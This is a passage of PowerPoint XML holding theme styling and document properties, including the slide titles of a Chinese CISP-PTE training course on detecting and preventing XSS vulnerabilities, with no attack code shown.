          <a:defRPr b="1" dirty="0"/>
        </a:defPPr>
      </a:lstStyle>
      <a:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent2"/>
        </a:lnRef>
        <a:fillRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:fillRef>
        <a:effectRef idx="2">
          <a:schemeClr val="accent2"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </a:style>
    </a:spDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="谷安模板-1.potx" id="{20370F93-E01C-46B9-8133-FC051707147A}" vid="{288D7D58-60AC-41C3-82B0-33C6BDCAB984}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="gooan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rgbClr val="C00000"/>
            </a:gs>
            <a:gs pos="80000">
              <a:srgbClr val="70201E"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:shade val="94000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
        </a:gradFill>
      </a:spPr>
      <a:bodyPr rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr b="1" dirty="0"/>
        </a:defPPr>
      </a:lstStyle>
      <a:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent2"/>
        </a:lnRef>
        <a:fillRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:fillRef>
        <a:effectRef idx="2">
          <a:schemeClr val="accent2"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </a:style>
    </a:spDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="gooann" id="{B3505433-59A5-6646-97E7-6033771F0962}" vid="{C4BE278A-D352-A14C-8A72-5E8A33244176}"/>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谷安模板-1</Template>
  <TotalTime>29336</TotalTime>
  <Words>3959</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>380</Paragraphs>
  <Slides>52</Slides>
  <Notes>37</Notes>
  <HiddenSlides>7</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52</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="64" baseType="lpstr">
      <vt:lpstr>Adobe 黑体 Std R</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>gooann</vt:lpstr>
      <vt:lpstr>CISP-PTE   Web 安全基础(3) – XSS漏洞</vt:lpstr>
      <vt:lpstr>XSS漏洞</vt:lpstr>
      <vt:lpstr>什么是XSS</vt:lpstr>
      <vt:lpstr>跨站脚本漏洞风险</vt:lpstr>
      <vt:lpstr>存储式XSS漏洞</vt:lpstr>
      <vt:lpstr>存储式XSS漏洞</vt:lpstr>
      <vt:lpstr>什么是存储式XSS</vt:lpstr>
      <vt:lpstr>如何检测存储式XSS</vt:lpstr>
      <vt:lpstr>如何检测存储式XSS(续)</vt:lpstr>
      <vt:lpstr>如何检测存储式XSS(续)</vt:lpstr>
      <vt:lpstr>如何检测存储式XSS(续)</vt:lpstr>
      <vt:lpstr>如何检测存储式XSS(续)</vt:lpstr>
      <vt:lpstr>如何检测存储式XSS(续)</vt:lpstr>
      <vt:lpstr>如何防范存储式XSS</vt:lpstr>
      <vt:lpstr>如何防范存储式XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范存储式XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范存储式XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范存储式XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范存储式XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范存储式XSS（续）</vt:lpstr>
      <vt:lpstr>常用WEB漏洞扫描工具对存储式XSS漏洞扫描方法</vt:lpstr>
      <vt:lpstr>实验（1）</vt:lpstr>
      <vt:lpstr>实验（2）</vt:lpstr>
      <vt:lpstr>反射式XSS漏洞</vt:lpstr>
      <vt:lpstr>反射式XSS漏洞</vt:lpstr>
      <vt:lpstr>反射式XSS</vt:lpstr>
      <vt:lpstr>反射式XSS利用流程</vt:lpstr>
      <vt:lpstr>如何触发反射式XSS</vt:lpstr>
      <vt:lpstr>反射式XSS的检测与修复</vt:lpstr>
      <vt:lpstr>反射式XSS利用流程</vt:lpstr>
      <vt:lpstr>如何防范XSS</vt:lpstr>
      <vt:lpstr>如何防范XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范XSS（续）</vt:lpstr>
      <vt:lpstr>如何防范XSS（续）</vt:lpstr>
      <vt:lpstr>反射式XSS漏洞实验（1）</vt:lpstr>
      <vt:lpstr>反射式XSS漏洞实验（2）</vt:lpstr>
      <vt:lpstr>DOM式XSS漏洞</vt:lpstr>
      <vt:lpstr>DOM式XSS漏洞</vt:lpstr>
      <vt:lpstr>DOM式XSS的特点</vt:lpstr>
      <vt:lpstr>DOM式XSS漏洞的检测与修复方式</vt:lpstr>
      <vt:lpstr>DOM式XSS漏洞实验（1）</vt:lpstr>
      <vt:lpstr>DOM式XSS漏洞实验（2）</vt:lpstr>
      <vt:lpstr>XSS实验集合</vt:lpstr>
      <vt:lpstr>实验1:入门</vt:lpstr>
      <vt:lpstr>实验2: 绕过简单过滤</vt:lpstr>
      <vt:lpstr>实验3: input属性注入</vt:lpstr>
      <vt:lpstr>实验4: 正常注入</vt:lpstr>
      <vt:lpstr>实验5: 查询注入</vt:lpstr>
      <vt:lpstr>实验6: js值注入</vt:lpstr>
      <vt:lpstr>实验7: input hidden注入</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Linux系统管理与安全</dc:title>
  <dc:creator>高智震</dc:creator>
  <cp:lastModifiedBy>金炫臻</cp:lastModifiedBy>
  <cp:revision>2827</cp:revision>
  <cp:lastPrinted>2017-08-23T16:26:44Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-23T14:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-08T13:59:52Z</dcterms:modified>
</cp:coreProperties>
</file>